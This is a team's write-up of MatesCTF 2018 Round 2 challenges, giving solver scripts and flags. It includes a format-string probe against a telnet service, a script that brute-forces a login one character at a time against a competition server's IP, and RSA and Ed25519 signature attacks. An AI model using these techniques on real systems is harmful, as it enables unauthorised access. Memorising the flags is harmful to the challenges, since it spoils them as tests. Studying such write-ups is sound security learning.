Matesctf - 2018 - Round 2

Sanity Check

Rotate to find the flag:
kc1{sm}htscaX3y4ttXc_nfe
solver.py
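"""Sanity-check solver: walk the scrambled string with a 6,6,6,5 step pattern.

Stepping through ``s`` (wrapping modulo its length) and collecting the visited
characters rotates the padded flag back into readable order; the collected
string is printed as-is.
"""

s = "kc1{sm}htscaX3y4ttXc_nfe"


def pick_chars(scrambled):
    """Return the characters of ``scrambled`` visited by the step walk.

    The step is 6, except on every fourth index after the first
    (``i % 4 == 0 and i != 0``) where it is 5; the running position wraps
    modulo ``len(scrambled)``.  An empty input yields an empty string instead
    of a ZeroDivisionError from the modulo.
    """
    if not scrambled:
        return ""
    length = len(scrambled)
    picked = []
    pos = 0
    for i in range(length):
        pos += 5 if (i % 4 == 0 and i != 0) else 6
        picked.append(scrambled[pos % length])
    return "".join(picked)


out = pick_chars(s)
print(out)  # parenthesised form runs under both Python 2 and Python 3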
flag
matesctf{s4n1ty_ch3ck}

Programming - Math Master

server.py
import random
import gmpy2
import sys
flag = ''  # left empty in the published source; printed verbatim once PoW() succeeds
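def is_valid_triple(a, b, c, r, p):
    """Return True iff (a, b, c) passes the challenge's bounds and relation.

    Bounds: a >= 2, b >= 2, c >= r (c == r is accepted) and a, b, c <= p.
    Relation: a^2 + b^2 == c^2 (mod p).  The relation also holds over the
    plain integers for any scaled Pythagorean triple, so this "proof of
    work" costs the client no actual work.
    """
    if a < 2 or b < 2 or c < r or a > p or b > p or c > p:
        return False
    return (a * a + b * b) % p == (c * c) % p


def PoW():
    """Run the proof-of-work prompt and return True only for a valid triple.

    Draws a random 1024-bit r, takes p = next_prime(r), prints the challenge
    and reads one line "a b c" from stdin.  Malformed input (wrong field
    count or a non-integer field) and EOF yield False.  Unlike the original
    bare ``except:``, other exceptions such as KeyboardInterrupt and
    SystemExit are no longer swallowed.
    """
    r = random.getrandbits(1024)
    p = gmpy2.next_prime(r)
    print('Give me a triple that a^2 + b^2 = c^2 mod p (a,b,c > 1)')
    # %s reproduces the comma-separated Python 2 print output exactly.
    print('which r < c < p, r = %s and p = %s' % (r, p))
    try:
        read_line = raw_input  # Python 2
    except NameError:
        read_line = input  # Python 3
    try:
        a, b, c = [int(i) for i in read_line().split(' ')]
    except (ValueError, EOFError):
        # ValueError: not exactly three fields, or a non-integer field.
        return False
    return is_valid_triple(a, b, c, r, p)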
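if __name__ == '__main__':
    print('We have a new proof of work system. Hope you can pass it')
    # The flag is gated on the proof-of-work prompt; any failure ends the process.
    if not PoW():
        sys.exit(0)
    # Do some thing in here
    print(flag)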
$(3k)^2 + (4k)^2 = (5k)^2$
So we just need to find a k for which c = 5k lies in the range the server prints (r < c < p).
flag
matesctf{w0w!_y0u_4r3_th3_tru3_m4st3r}

RE - Some Node

Find the flag
https://pastebin.com/pEH3xMmi
After deobfuscating and beautifying the JS code, we have:
// 46 per-position bases (hex): for input index d, arr[d] and arr[d + 1] are
// the bases raised to the char codes of input characters d and d + 1.
var arr = [0x4df, 0x20c, 0x3f5, 0xe7, 0x50a, 0xc0, 0x31e, 0x44e, 0x1a0, 0x409, 0x3a0, 0x48f, 0x54, 0x114, 0x48f, 0x158, 0x4a3, 0xb7, 0x36e, 0x25, 0x26a, 0x14, 0x3d, 0xf5, 0x328, 0x3, 0x9, 0x29f, 0x223, 0x162, 0x2, 0xc3, 0x16c, 0x4b5, 0x14c, 0x26e, 0x18a, 0x1f6, 0x38e, 0x48a, 0x399, 0xd4, 0xb, 0x339, 0x439, 0x35a]
// 23 expected values, one per pair of input characters: res[d / 2] is compared
// against arr[d]^code(d) + arr[d + 1]^code(d + 1) in the question callback.
var res = ["28147733412126416143356431805908788848700221138704543049914240750210634423746310795983766007927465537337773675180806753151701119440592637649120674223666407488884928441158916203204899710775857273445369674102642893364763591400590102447525349505851152484162354348321887410090849255334994123327420802898472430345805178661836803666639323568991",
    "4473996724368524833786391433108844308119859952032682936027584205386586896550944640275021793883201700700514551906732365044019104422174629553761105852002509929562143469997523117124506809324566089069073128574094653939495701324286126323872403203843117997709033282947687736178657057176776167569597189544477293458075431109037887022922995862044778186014072",
    "5221757322360453814399619119797328730081768639738340228795306317929495307424129397533164035147145139501711378195989662703457058674922647017677641997958212209715853394405199698854615367381241522638332855369669637921940456218422736881713766324155332523065076931150147930439076555927630923249342658654421542335027590781652594413705304583637509924249026877718528",
    "4288796074237034437390498054578069998869358869004476456766478523669292199763563859166332976529271326671723122114069619124487514887631605436360899314383687525668071526886099615149600968654081981644745693079557652346743251676118813596297248841958787152919005957747751054440747976230293600734615766823819034154768821138600838634394395607040",
    "14076013253790208221380376940543328033797996734937324461092670075568213933095877897871317709593483134711226289488906499692279422330149725140662609542530782668583349028232449084925688965827512898667668297465086787068857681189679064721661863552760708013615289105346008454343049850126111059987669613256302532637101210381393593",
    "3170984862814335610889394857268118759960325521680787540826832022026645554821331792672346549865014011745531958862686754481741463830750936074693372236094260712570608495334431476244124947276622402417881608109775154769166561656581871",
    "640534593409367944820111634498760938267977163203823820715780096258045201701884350666759909980314003408439218106009709023441498640277221820882329768881560600249454971874214496593510400",
    "3054008491803476523991722331221283812575362956565248969531261498410356443440844995468505356120150838872923755597173544178108356009061441377375965518974487023563293955608211326519992225805676224046227075326718674868707224298790643639447097559142628200669923116286300598253677807",
    "11825467005351759256803982016693419569859778726116603161520080056295405434359637802900995806871281744944894725671551548372627936387090472057639283764362883564011763689677293068969256929904750428106728266855094662559407016466487151568491033269952394841089030309505860777621941045942191545096050",
    "95315558114905684185983985374975183308951113563062623116475198835692716601937445684935504522932043984030863952175035421805721885279402513792926454829",
    "568411832949614651671142719945415608127060862485085190627402422679334039283858151423074972328444453188994097026126033531745745182080440373699487557208262922088414788870610222425071924576508046242112164217950489665579590122429337038781735868490767027930556344827671269493314745010314564749975857545925515864563310856530558976",
    "336977722880191342605575603118791200417398331912137888340963370337110660382606419040522445704275195130010931083480119765953266883459481380782253911818762412576824761062151635689211563031457817906379156566",
    "550980307981869851269598052405393915654137449193107513051581276222976204511239411472488703652429952478106978377307176964955131352658257626996213492171855578347127673258296322799076009982396194892143126682738410757818300814252177596972575825143602239301940843722620880682241410122913099229483",
    "2116883984537179161323051237302600348205261488554202476306373757191773587930042802714540061481828893455114076308887612828288496439778691034823640798092679111474708450621749610480729543435147050165775498058724327335652288975750792680298065894794942053493523979750248709053919864532299418562",
    "69399375244028224296642472209316572707515378986312745114686995580970893877402763319257611514920487047800277191373708351938644016364554332685488473426826389617490173998496242153068462686126093317159995413848975293933851440015669145081177295951049351767703267253592914502486194187",
    "108069568093999851662822458713653641799313823651313411726442264688305780526449872871578134658368114229428136524302518871595277609778936351286025083447082899477595981950684257493405990766341354174493412441775130883314659513416700069639555437917371",
    "810168139475125483474436257612533737098123885235428798630565546494464723025531420196151417421770610696476308685128054281577220738814998009464066172718837044339991297438068334616471134595700413548441652396529038549589448408573522520319029333573237076094959436510970778357141221383928802814529338473459789626277378370074639253787522155414409",
    "25709128146585820308323789054322316306741541122564289869333094354728180791328346068105293286719059385473674347464040003022820308134361990829451853626575214956590963849132803894527744140191922090907047586017660459356274997166009612370291300171348102939148799637979136",
    "20586947507559441775857953638972752821850324822265326533025116982642596424691534453969981555866296315169930333224915952011544646505792545652650150396785304286172795619455937383787749912084684960586776069292294416743476954660022058721443347705140193251202533638418316582665764995072",
    "31228646052679859515463165346865716942464022533455185436751817507356247657636130374582296029363951202093935664822422820552386581073358951047329630542546821224082154582056386185405241963474261350635809881772014052271509265044443425580418128640962720914886585048513848597866310933007135087668196645121895054790134905892165910528",
    "402406390215000280827794679583610110408732123703853481176670825453960685564431613879605832281716093912057305520208643580463751956991954154250304497560335889609341867460347361654352493185289131298557807863773711898310920025355446196482988507754127542467837062283029214819629978834345",
    "45248618545403619762841478032308849940249937192500109908548344603743340141365377191917807648219437711559443118349663821666714276892426064382596581675506",
    "4851890390156174270135015984067408628443606400167912403797688925806912120242318647460426393207026321666262379026053686013574664475317152408144154745390289512723808744249055757655231288588261603032037978960629407963317577071005529207550710551649520103710842971763164677843537776551079122571097576939749759108109841488895365934592210991209564188234383045302346014616009"];
const BigNumber = require("bignumber.js")
// POW_PRECISION 0 keeps exponentiatedBy exact (no rounding of the result).
BigNumber.config({
    POW_PRECISION: 0
})
const readline = require("readline").createInterface({
    input: process.stdin,
    output: process.stdout
})
readline.question('What is the flag?', c => {
    // Check the input two characters at a time: for pair index d the test is
    // arr[d]^code(c[d]) + arr[d + 1]^code(c[d + 1]) == res[d / 2].  A mismatch
    // only logs 'KO'; the loop does not stop early and nothing is printed on a match.
    for (let d = 0; d < c.length; d = d + 2) {
        const codeLeft = BigNumber(c.charCodeAt(d));
        const codeRight = BigNumber(c.charCodeAt(d + 1));
        const termLeft = BigNumber(arr[d]).exponentiatedBy(codeLeft);
        const termRight = BigNumber(arr[d + 1]).exponentiatedBy(codeRight);
        const expected = BigNumber(res[d / 2]);
        if (!expected.isEqualTo(termLeft.plus(termRight))) {
            console.log('KO');
        }
    }
    console.log("You must know the flag by now!");
    readline.close();
});
So the equation we need to solve looks like this:
$g^e + h^f = c$
Since g, h and c are known and e, f are in string.printable, we can brute-force it!
flag
matesctf{OMG_I'm_s0_t1r3d_0f_m4k1ng_l0ng_fl4g}

Pwn - Exploit 101

telnet 35.247.166.229 1337
https://drive.google.com/file/d/1pQQTrpqqDPzYXEOQFAkYACSaBruHO2Wt/view
It was a simple format-string attack. Just input
%x %x %x %x %x %x
The number you need is the 6th one.

Web - Warm up

Warm up
http://35.187.239.167:8080
http://125.235.240.167:8080
We just need to brute-force the password: the server logs you in whenever substr(input_password, flag) == True, so the flag can be recovered one character at a time.
import requests
import string
flag = "matesctf{"
url = "http://125.235.240.167:8080"
found = ''
# The login apparently accepts any password that matches a prefix of the flag
# (the substr check described above), so each accepted character extends the
# known prefix by one and the loop ends once the closing brace is accepted.
# Server-side, comparing the complete string (ideally in constant time) would
# remove this character-by-character oracle.
while found != '}':
    for ch in string.printable:
        payload = {"username": "admin", "password": flag + ch}
        resp = requests.post(url, payload)
        if resp.text.find("Well") == -1:
            continue
        print(flag)
        flag += ch
        found = ch
flag
matesctf{suck_a_3cm_weath3r}

Crypto - CryptoX

Find the flag :D
https://gist.github.com/minhtt159/8b7715ddd5d03b65d1cd1e4690d11727
So basically we know:
$m^{65537} = c_1$
$m^{65539} = c_2$
where $c_1$, $c_2$ are known.
From Bézout's identity:
$65537 \cdot 32769 + 65539 \cdot (-32768) = 1$
To get m, we compute:
$\left((m^{65537})^{32769} \cdot (m^{65539})^{-32768}\right) \bmod n$
In code, it looks like this:
# Bézout combination of the two ciphertexts: c1^32769 * (c2^-1)^32768 == m (mod N),
# because 65537*32769 - 65539*32768 = 1.  Here m1 and m2 hold c1 and c2 (the
# author's names), and invert() is a modular inverse — presumably gmpy2.invert;
# confirm against the solver's imports.
pow(m1,32769,N) * pow(invert(m2,N),32768,N) % N

Crypto - Cookie Generator

AFAIK, You can solve this challenge without source
nc 125.235.240.166 12345
Read this write-up: (btw, sha256(flag) is a joke... I am so dumb...)
matesctf{s33?_y0u_c4n_d0_1t_w1th0ut_s0urc3}

Crypto - Fake Tictactoe?

Prove that you are tictactoe and you can have the flag
nc 125.235.240.166 15997
https://gist.github.com/minhtt159/ab1eea6fc9fa22a8e94b071192e48847
We are so lucky — read this write-up, everything is there...
https://grocid.net/2016/04/14/sctf-ed25519/
pow
Welcome to the admin panel
You can choose one of these keys to sign your message
1. 893731438d5dd099be08dd60b0befc32996eda16ea3a0b56d7f261251d27fd62
2. b1ecbe4f2573a7dffcb35f9c15c40849fa7504f7e95d44efc967b959da393164
3. e5c8620b47d1c4a17b7bb6c48a6a8246a6e58dd8c9a54184b76c1cbedb8f31f2
4. 85166ca9caf0385d6aee6973c83ec93887047ec8993e695ba15b9a0a8fa4a35a
5. 3be36f7a4d6d2f4970a8a7443d999127949b363fc271e1db1eadac3216072bb8
Commands:
1. Sign
2. Execute
Your choice: 2
Public key: 5bfcb1cd3938f3f6f3092da5f7d7a1bdb1d694a725d0585a99208787554e110d
Your command: tictactoe
Your signature: 68299a51b6b592e2db83c26ca3594bdd81bdbb9f11c597a1deb823da7c8b9de82a1db6766d2bc10b4b3d570df4fa549077c125f87d9eb2b031675cc6bec91007
flag
matesctf{Br1ng_m0r3_Curv3_Plz}

Pwn - Xmodem

https://github.com/Hi-Im-darkness/CTF/tree/master/matesctf2018/Round2/xmodem

RE - Mini Factory

https://github.com/kungfulon/matesctf-s3/tree/master/round2/re/MiniFactory

Final Scoreboard

Our Team

Nice ctf, nice organizer, kudos to all players!